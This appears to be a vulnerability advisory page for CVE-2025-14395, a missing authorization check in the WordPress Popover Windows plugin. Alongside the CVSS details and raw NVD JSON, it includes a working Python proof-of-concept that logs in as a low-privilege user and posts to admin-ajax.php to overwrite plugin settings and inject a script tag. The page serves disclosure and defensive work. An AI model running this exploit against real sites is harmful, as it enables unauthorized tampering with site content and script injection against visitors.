Security Vulnerability Report
中文
CVE-2025-14395 CVSS 4.3 MEDIUM

CVE-2025-14395

Published: 2025-12-13 16:16:49
Last Modified: 2026-04-15 00:35:42

Description

The Popover Windows plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple ajax actions (e.g., pop_submit, poptheme_submit) in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings and content.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Popover Windows插件 <= 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14395 PoC - WordPress Popover Windows Plugin Authorization Bypass # This PoC demonstrates how an authenticated user with subscriber-level access # can modify plugin settings without proper authorization TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_nonce_and_cookies(): """Login to WordPress and get authentication cookies and nonce""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies: print("[-] Login failed") return None, None print("[+] Login successful") return session, session.cookies def exploit_authorization_bypass(session, cookies): """Exploit the missing capability check vulnerability""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Attack vector 1: pop_submit - Modify popover settings pop_submit_data = { 'action': 'pop_submit', 'popover_option': 'modified_by_attacker', 'popover_content': '<script>alert("XSS")</script>', 'popover_theme': 'malicious_theme' } print("[*] Sending pop_submit request...") response = session.post(ajax_url, data=pop_submit_data, cookies=cookies) print(f"[+] Response status: {response.status_code}") print(f"[+] Response: {response.text[:200]}") # Attack vector 2: poptheme_submit - Modify theme settings poptheme_data = { 'action': 'poptheme_submit', 'theme_name': 'injected_theme', 'theme_style': 'malicious_css' } print("[*] Sending poptheme_submit request...") response = session.post(ajax_url, data=poptheme_data, cookies=cookies) print(f"[+] Response status: {response.status_code}") if __name__ == "__main__": session, cookies = get_nonce_and_cookies() if session and cookies: exploit_authorization_bypass(session, cookies) print("[+] Exploitation attempt completed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14395", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:49.260", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Popover Windows plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple ajax actions (e.g., pop_submit, poptheme_submit) in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the plugin's settings and content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/popover-windows/tags/1.2/popoveroptions.php#L98", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0cae43cb-a0b7-4067-95b3-26fec31ebf42?source=cve", "source": "[email protected]"}]}}